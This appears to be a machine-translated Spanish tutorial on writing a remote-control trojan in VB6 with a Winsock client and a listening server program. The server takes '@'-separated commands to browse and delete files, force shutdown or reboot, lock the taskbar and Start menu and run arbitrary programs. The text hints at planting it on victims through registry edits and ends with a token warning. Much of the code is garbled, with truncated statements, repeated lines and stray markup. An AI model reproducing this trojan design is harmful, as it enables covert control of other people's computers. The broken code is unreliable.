Cómo utilizar VB6.0 para editar software de control remoto

Iroma, cuyo nombre proviene de Tyroma en la mitología griega antigua, es un software de control remoto. El software troyano popular en Internet ahora es básicamente el modelo cliente/servidor, que es la llamada estructura C/S, y algunos han comenzado a recurrir a la estructura B/S. No hablemos de la estructura B/S aquí. Por el momento, este artículo presenta principalmente la estructura C/S. El principio es iniciar directamente el programa ejecutándose localmente con los mismos permisos que el usuario. Por lo tanto, si puede iniciar el programa del servidor en el lado del servidor (es decir, la computadora que está siendo atacada), puede usar las herramientas del cliente correspondientes para controlar directamente el programa del cliente. Aquí se explica cómo hacerlo en VB.

Primero, use VB para crear dos programas, uno es el programa cliente Cliente y el otro es el sistema de programas del lado del servidor.

Cree un formulario en el proyecto Cliente, cargue el control WinSock (el propio VB tiene este control

Agregue winsock en la caja de herramientas), asígnele el nombre tcpClient, seleccione el protocolo TCP y luego agregue Dos cuadros de texto, ingrese la dirección IP del servidor o el nombre del servidor y luego cree un botón. Después de presionar el botón, la conexión se puede inicializar:

Private Sub cmdConnect_Click()

. p >

If Len(Text1.RemoteHost = Text2.Text

Finalizar si

Finalizar si

tcpClient.Connect

Timer1 .Enabled = True

End Sub

Una vez establecida la conexión, puede utilizar el evento DataArrival para manejar los datos recibidos LocalPort = 1999

tcpServer. Escuchar

p>

End Sub

Para prepararse para responder la solicitud de conexión del programa cliente, utilice el evento ConnectionRequest para responder la solicitud del programa cliente, el código es el siguiente:

Sub privada tcpServer_ConnectionRequest

(ByVal requestID As Long)

Si tcpServer.State <> sckClosed Entonces

tcpServer.Listen

End Sub

TcpServer.Listen(ByVal requestID As Long)

TcpServer.Listen(ByVal requestID As Long)

TcpServer.Listen(ByVal requestID As Long)

End Sub

TcpServer.Listen(ByVal requestID As Long)

TcpServer.Listen(ByVal requestID As Long) comprueba si la propiedad State del control es cerrado

Fin. Si 'Si no, cierre esta conexión antes de aceptar nuevas conexiones

tcpServer.Accept requestID

End Sub

De esta manera, presione el programa cliente. Después de presionar el botón de conexión, se activa el evento ConnectionRequest del programa del lado del servidor y se ejecuta el código anterior. Si no sucede nada más, se establece la conexión.

Una vez establecida la conexión, el programa del lado del servidor recibirá comandos del programa cliente a través del evento DataArrival para ejecutar el programa establecido. Por ejemplo: pase el nombre de la unidad del lado del servidor, el nombre del directorio, el nombre del archivo, etc. al cliente.

al cliente, después de que el cliente lo recibe, lo muestra en forma de árbol. Utilice el control TreeView para explorar el directorio de archivos del lado del servidor; forzar el apagado o reiniciar la computadora del lado del servidor; ; rastree el nombre del archivo o el nombre del directorio pasado al cliente. También elimine el nombre del archivo o el nombre del directorio; bloquee el botón de inicio en caliente y obtenga la imagen de la pantalla, la ventana y la lista de procesos; ; activar y finalizar el proceso en el lado remoto; abrir, cerrar y mover la ventana en el lado remoto; controlar el movimiento y el funcionamiento del mouse en la computadora de destino; intercambiar los botones izquierdo y derecho del mouse en el lado remoto; ingresar, descargar y cargar archivos en la computadora de destino; extraer, crear y modificar palabras clave del registro del sistema de la computadora de destino y en la pantalla del lado remoto; El programa del evento DataArrival es el siguiente:

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer. 1) = "@" Entonces

mKey = Left(strData, i - 1)

'Guarda el número de ID del comando en mKey

'Guarda el comando Coloque los parámetros en strData

strData = Right(strData, Len(strData) - i)

Salir para

Finalizar si

Siguiente i

Seleccione Case Val( mKey)

Caso 1

'Nombre de la unidad, nombre del directorio, nombre del archivo

Caso 2

Forzar el apagado del ordenador servidor

Caso 3

Forzar el reinicio del ordenador servidor

Caso 4

Bloquear tarea ventana de barra

Caso 5

Menú Inicio de bloqueo

Caso 6

Seguir los archivos pasados ​​desde el cliente al eliminar el nombre o directorio de los archivos; nombre;

Caso 7

Evitar la tecla de inicio en caliente;

Caso 8

Ejecutar cualquier programa del lado del servidor;

p>

Finalizar selección

End Sub

El cliente usa tcpClient.SendData para enviar el comando. SendData envía datos. Un comando consta de un ID de comando y parámetros de comando, separados por el símbolo "@".

Además, cuando el cliente se desconecta del servidor, el servidor aplicará el evento tcpServer_Close y continuará preparándose para recibir solicitudes del cliente. El código es el siguiente:

Privado. Sub tcpServer_Close()

tcpServer.Close

tcpServer.Close()

tcpServer.Close()

tcpServer.Listen

End Sub

Este es un programa básico de caballo de Troya. Siempre que su máquina ejecute el programa del lado del servidor, otros pueden controlar su computadora a miles de kilómetros de distancia. En cuanto a cómo ejecutar el programa del lado del servidor, debe usar su ingenio. Hay un método en mi programa fuente, que consiste en modificar el registro del sistema.

Un programa troyano exitoso es mucho más complicado que esto. Es necesario resolver problemas como el ocultamiento del programa, la copia automática y la difusión. Advertencia: Nunca utilice programas BO para dañar los sistemas de otras personas.